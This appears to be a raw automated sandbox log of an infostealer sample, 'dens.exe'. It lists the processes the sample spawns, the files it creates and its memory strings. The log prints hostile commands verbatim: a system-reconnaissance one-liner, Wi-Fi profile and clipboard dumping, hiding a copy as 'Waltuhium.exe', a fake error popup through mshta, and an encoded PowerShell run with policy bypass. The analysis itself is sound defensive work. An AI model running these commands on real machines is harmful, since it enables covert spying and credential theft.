            Source: dens.exe, 00000000.00000003.1661475799.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs dens.exe
            Source: dens.exe, 00000000.00000003.1666353635.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662940240.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exeBinary or memory string: OriginalFilename vs dens.exe
            Source: dens.exe, 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs dens.exe
            Source: dens.exe, 00000001.00000002.2057481054.000002D9AA8E0000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs dens.exe
            Source: dens.exe, 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs dens.exe
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Users\user\Desktop\dens.exeProcess created: Commandline size = 3647
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.evad.winEXE@144/329@5/7
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\WaltuhiumUpdateService\
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2908:120:WilError_03
            Source: C:\Users\user\Desktop\dens.exeMutant created: \Sessions\1\BaseNamedObjects\W
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482
            Source: dens.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\dens.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\dens.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: tasklist.exe, 0000001D.00000003.1763963862.0000022FF79DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processystem32;^
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: tasklist.exe, 0000001D.00000002.1765374241.0000022FF79E0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000001D.00000003.1764322605.0000022FF79DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processystem32;DD
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: tasklist.exe, 0000000A.00000003.1723020899.0000018791CDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_ProcessH;.MSCP
            Source: dens.exe, dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: dens.exe, 00000001.00000003.1775186095.000002D9AC3BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: tasklist.exe, 0000000A.00000003.1723345504.0000018791CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_ProcessH;.MSCP66
            Source: dens.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\dens.exeFile read: C:\Users\user\Desktop\dens.exe
            Source: unknownProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Users\user\Desktop\dens.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\dens.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: libffi-8.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: vcruntime140_1.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: libssl-3.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: sqlite3.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: sbiedll.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\dens.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
